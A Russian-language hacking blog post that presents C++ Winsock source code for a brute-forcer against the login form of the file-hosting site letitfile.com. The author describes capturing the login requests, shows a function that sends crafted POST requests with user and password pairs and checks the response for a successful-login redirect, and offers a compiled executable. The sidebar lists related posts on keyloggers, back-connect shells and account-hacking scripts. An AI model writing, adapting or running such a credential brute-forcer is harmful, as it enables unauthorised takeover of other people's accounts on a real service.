Или как сделать брут для letitfile.com

screen Что нам стоить letitfile.com забрутить?

LetitFile брутер

Итак, сегодня я задумался, а почему на перле такой брутер запилить можно, а на моем любимом C++ нельзя? Почесал голову, да и начал писать. Через час многопоточный брутер был готов. Использовал я винсок (и CodeGear хотя можно было и на АПИ, но АнсиСтринг мне больше по душе. Привык), а не как некоторые читеры, лвп :grin:…

Зарегистрировавшись на letitfile.com я запустил свой HTTP Analyzer и отловил запросы моего браузера при правильной авторизации. Потом я вышел, и ввел левые данные. И конечно же не зашел, но запросы у меня были. В результате при успешной авторизации в хттп хидере добавляется:

1
Location: /my_files/

Вот и вся хитрость :mrgreen:… Итак, вот код, который отвечает за проверку авторизации:

bool Check(AnsiString user, AnsiString password)
{
   WSADATA wsaData;
   SOCKADDR_IN ssin;
   memset((char *)&ssin,0,sizeof(ssin));
   SOCKET s;
   char cIp[20];
   memset(cIp,'\0',sizeof(cIp));
   WSAStartup(MAKEWORD(2,2),&wsaData);
   GetIpByHostName("letitfile.com",cIp,sizeof(cIp));
   s = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
   ssin.sin_family = AF_INET;
   ssin.sin_port = htons(80);
   ssin.sin_addr.s_addr = inet_addr(cIp);
   connect(s,(SOCKADDR *)&ssin,sizeof(ssin));

   char query[2048];
   sprintf(query,"POST /remindme/ HTTP/1.1\r\nHost: letitfile.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive\r\nReferer: http://letitfile.com/remindme/\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n\r\nlogin=%s&pass=%s&loggin=y&x=69&y=23\r\n\r\n",29+user.Length()+password.Length(),user.c_str(),password.c_str());

   send(s,query,strlen(query),0);

   AnsiString otv;
   memset(query,'\0',sizeof(query));
   while(recv(s,query,sizeof(query),0)>0)
   {
      otv = otv + (AnsiString)query;
      memset(query,'\0',sizeof(query));
   }

   closesocket(s);
   WSACleanup();

   if(otv.Pos("Location: /my_files/"))
      return true;
   else
      return false;
}

Вот и весь код… Самое интересное, мне кажется, это строка sprintf с запросом. А остальное вы, если читали мои предыдущие посты, знаете.
Напоследок, exe файл брутера:
К сожалению по прошествии времени multi-up потер файл icon twisted Что нам стоить letitfile.com забрутить?

tt twitter big4 Что нам стоить letitfile.com забрутить? tt digg big4 Что нам стоить letitfile.com забрутить? tt facebook big4 Что нам стоить letitfile.com забрутить? tt gmail big4 Что нам стоить letitfile.com забрутить? tt myspace big4 Что нам стоить letitfile.com забрутить? tt reddit big4 Что нам стоить letitfile.com забрутить?

Комментарии (3) на “Что нам стоить letitfile.com забрутить?”

Оставить комментарий

CAPTCHA изображение
Обновить изображение
*

RSS-подписка NIG Twitter-подписка NIG

Метки
Друзья
Блог линуксоида Программы для диагностики компьютера
Супер Pixel
Убивалка флешаБэкконект шелл. Часть вторая.Бэкконект шелл. Начало.НАМ для деления чиселПростая арифметикаПередача файлов. Часть третья. Клиент.Dll injectionСканер портовКодировка текста в BMPРухнул на два дняПередача файлов. Часть вторая. Сервер.Поворот и BMPCRC32 суммаBMP форматфайловые вирусыассемблер, строкиАссемблер и матрицапримеры ассемблерМногопоточное программированиеАрхитектура клиент — серверРаздача ICQПишем шуткупишем паукаПривет от ДжеймсаОбход firewallЗагрузка картинок на Gyazo, прямо из ThunarКейлоггер 3Плюшки в контекстном меню Thunarc по сетиКейлоггер 2КейлоггерСкачать Ассемблер!VirusCheckerОтморозки мешают жить ?! Не проблемма !Cкрипты для взлома аккаунтов QIPWinAPI. Работа с файлами. Часть третья. ЧтениеDlink exploitБрут сайта etxt.ruКрасивая раскладка клавиатуры в GnomeМои безделушки на PerlКак запускать Perl скрипты под WindowsБрутфорс партнёрки ZipCoinПарсер upwap.ruИзменения в блогеЧудо ЗаливалкаСкрипт для загрузки файлов на Zalil.ruЯндекс «чоткий» поисковик!WinAPI. Работа с файлами. Часть вторая. ЗаписьWinAPI. Работа с файлами. Часть первая. ПоискПолучение MD5 хеша средствами C++Что нам стоить letitfile.com забрутить?WarCraft III запуск под LinuxЭнтропия файлаWinsock и C++. Мини прокси. Часть |\\/. Завершающая.Перепилил чекер для 4gameЧекер акаунтов YoupornCMailSend v 1.1. Отправка почы без проблемСлучайные числаWinsock и C++. Часть |||. smtp монстр.Брутфорс LetitFile.comИспользование X-Forwarded-For, для обмана веб-сервера, подмена IP подручными средствамиДело было вечером, делать было нечего…Мысли о аудио сервереПарсер ников из твиттераКонец школоло…Perl+Linux. Заметка первая (Удобный Paste bin).Бэкконект шелл.E-MAIL + winsocket + Cpp. Сложно?winsock и C++. Часть ||. Атака клоунов.C++ резолвинг адресаPerl, анализ HTML кода и определение CMSМатематика в C++winsock и C++